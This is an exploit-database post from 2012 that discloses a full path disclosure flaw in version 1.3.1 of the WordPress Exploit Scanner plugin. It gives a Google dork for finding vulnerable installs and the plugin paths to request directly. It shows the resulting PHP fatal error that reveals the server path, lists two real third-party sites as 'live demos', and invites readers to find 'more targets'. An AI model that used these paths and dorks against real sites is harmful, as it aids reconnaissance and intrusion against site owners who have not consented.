wordpress exploit scanner plugin Full Path Disclosure

2012-07-10 11:14:48
Inviato da: Crim3R

# Exploit Title: wordpress exploit scanner plugin Full Path Disclosure

# Google Dork: inurl:"/plugins/exploit-scanner/"

# Date: 07/10/2012

# Author: Crim3R

# plugin download Link : http://downloads.wordpress.org/plugin/exploit-scanner.1.3.1.zip

# Version: 1.3.1

# Tested on: all

========================================

you can find full path of target by accessing directly to the file Or Error_log In The same diectory

/wp-content/plugins/exploit-scanner/exploit-scanner.php

/wp-content/plugins/exploit-scanner/error_log

http://127.0.0.1/wordpress/wp-content/plugins/exploit-scanner/exploit-scanner.php

Fatal error: Call to undefined function add_action() in /path-on-server/wp-content/plugins/exploit-scanner/exploit-scanner.php

on line 49

========================================

live demos:

http://fkstudio.free.fr/blog/wp-content/plugins/exploit-scanner/exploit-scanner.php

http://www.bienalpernambuco.com/wp-content/plugins/exploit-scanner/exploit-scanner.php

More Targets On Google :D

[email protected]===========

sites :

http://Secure-Land.net

http://IrIsT.Ir


thanks to : 2MzRp - Mikili - Amir - 0x0ptim0us - iC0d3R - farbodmahini

and all Secure-land & IrIsT Members ...

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.